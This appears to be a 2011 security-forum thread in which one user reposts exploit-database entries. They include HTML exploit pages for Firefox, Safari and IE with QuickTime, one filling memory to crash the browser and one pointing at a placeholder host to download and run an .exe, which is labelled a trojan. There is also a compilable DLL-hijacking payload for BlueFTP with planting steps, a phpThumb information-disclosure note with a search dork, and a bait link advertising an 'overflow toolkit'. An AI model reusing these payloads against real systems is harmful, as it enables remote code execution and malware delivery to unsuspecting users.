Floor 9, posted 11-05-19 20:48
Reply: DarK-Z [bridex], forum user
[1337day.com / Inj3ct0r Team ASCII-art banner: "Exploit database separated by exploit type (local, remote, DoS, etc.)"; Site: 1337day.com; Support e-mail: submit[at]1337day.com; "I'm KedAns-Dz member from Inj3ct0r Team"]

<!--
###
# Title : (Firefox & Safari & IE) + QuickTime res://mshtml.dll/ Remote Exploits
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : Windows
# Impact : Remote { Buffer Overflow + Download/Exec File (Tr0j4n3) }
# Tested on : Windows XP SP3 Fr (Firefox 4.0 + Safari 4.0.5 & IE7) << QuickTime v7.5.5
###
# (~) Greetings To : Caddy-Dz (+) JaGo-Dz (+) Dr.Ride (+) All My Friends
###
-->

#=======[ PoC (1) Buffer Overflow & Crash !]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
function boom() {
    // four distinct fill patterns, doubled on every iteration and written to the document
    var longunistring1 = unescape("%u4141%u4141");
    var longunistring2 = unescape("%u4242%u4242");
    var longunistring3 = unescape("%u4343%u4343");
    var longunistring4 = unescape("%u4444%u4444");
    for(i=0; i <= 999 ; ++i) {
        longunistring1+=longunistring1;
        longunistring2+=longunistring2;
        longunistring3+=longunistring3;
        longunistring4+=longunistring4;
        document.write(longunistring1);
        document.write(longunistring2);
        document.write(longunistring3);
        document.write(longunistring4);
    }
    document.write(longunistring1);
    document.write(longunistring2);
    document.write(longunistring3);
    document.write(longunistring4);
    document.write(document.body.innerHTML);
}
var objectSource = boom();
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

#=======[ PoC (2) Download/Exec File]============>

<html><head>
<script src="res://mshtml.dll/objectembed.js"></script>
<script language="javascript">
var objectSource = "http://[HOST]/{file}.exe.gif";
</script>
</head>
<body onload="ObjectLoad();" leftmargin="0" topmargin="0" scroll="no">
<form id="objectDestination"></form></body>
</html>

# Save either HTML snippet as a file and use it (Boom !! :D)

<!--
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================
-->
Floor 10, posted 11-05-19 20:49
Reply: DarK-Z [bridex], forum user
SEBUG-ID: 20523  Published: 2011-05-06  Test method: [www.sebug.net] The programs (methods) provided by this site may be offensive in nature and are for security research and teaching only; use at your own risk!

# Exploit Title: phpThumb 'phpThumbDebug' Information Disclosure
# Google Dork: inurl:phpThumb.php
# Date: 06/05/2011
# Author: mook
# Software Link: http://phpthumb.sourceforge.net/#download
# Version: 1.7.9
# Tested on: linux

Vulnerability: Information disclosure which includes absolute system paths, OS flavour, application configuration information and other installed application versions.

The vulnerability can be triggered by appending phpThumbDebug= and any number from 0 to 10 to any phpThumb.php request. e.g.:

The response will be an image render of the debug information.

Remediation: The responsible code can be found in phpThumb.php itself; change the default "$PHPTHUMB_CONFIG['disable_debug'] = false;" to "$PHPTHUMB_CONFIG['disable_debug'] = true;".

(From sebug.net, 2011-05-08)
Floor 11, posted 11-05-19 20:50
Reply: DarK-Z [bridex], forum user
BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll)
Floor 12, posted 11-05-19 20:51
Reply: DarK-Z [bridex], forum user
[1337day.com / Inj3ct0r Team ASCII-art banner: "Exploit database separated by exploit type (local, remote, DoS, etc.)"; Site: 1337day.com; Support e-mail: submit[at]1337day.com; "I'm KedAns-Dz member from Inj3ct0r Team"]

# ======[ Exploit DLL C0de ====>

/*
###
# Title : BlueFTP 1.2 DLL Hijacking Exploit (ProfUIS250m.dll)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com / exploit-id.com
# Twitter page : twitter.com/kedans
# platform : Windows
# Target : BlueFTP 1.2
# Tested on : Windows XP sp3 France
###
1. Compile the dll
2. Replace 'BlueFTP 1.2' in the 'BlueVoda Website Builder' directory with your newly compiled dll
3. Reboot or start BlueFTP
4. Boom calc!
###
*/

#include <windows.h>
#include <stdlib.h>     /* exit() */

#define DllExport __declspec (dllexport)

int Viva_Juventus(void);   /* declared before use */

DllExport void hook_startup()
{
    Viva_Juventus();
}

int Viva_Juventus(void)
{
    WinExec("calc", 0);    /* proof of code execution in the host process: launch calc */
    exit(0);
    return 0;
}

/*
#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + kaMtiEz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * KelvinX (kelvinx.net) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================
*/
Floor 13, posted 11-05-19 20:52
Reply: DarK-Z [bridex], forum user
EXPLOIT toolkit, multi-function: http://auction1.paipai.com/14E8366C0000000000143AF40797F580 Everyone click it, the coolest overflow toolkit! [This post was edited by DarK-Z (bridex) on May 19 at 20:59]
Floor 14, posted 11-05-19 20:56
Reply: DarK-Z [bridex], forum user
Heh, you've been fooled~
Floor 15, posted 11-05-20 11:01
Copyright 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software by: NetDemon
Guangdong ICP registration no. 05087286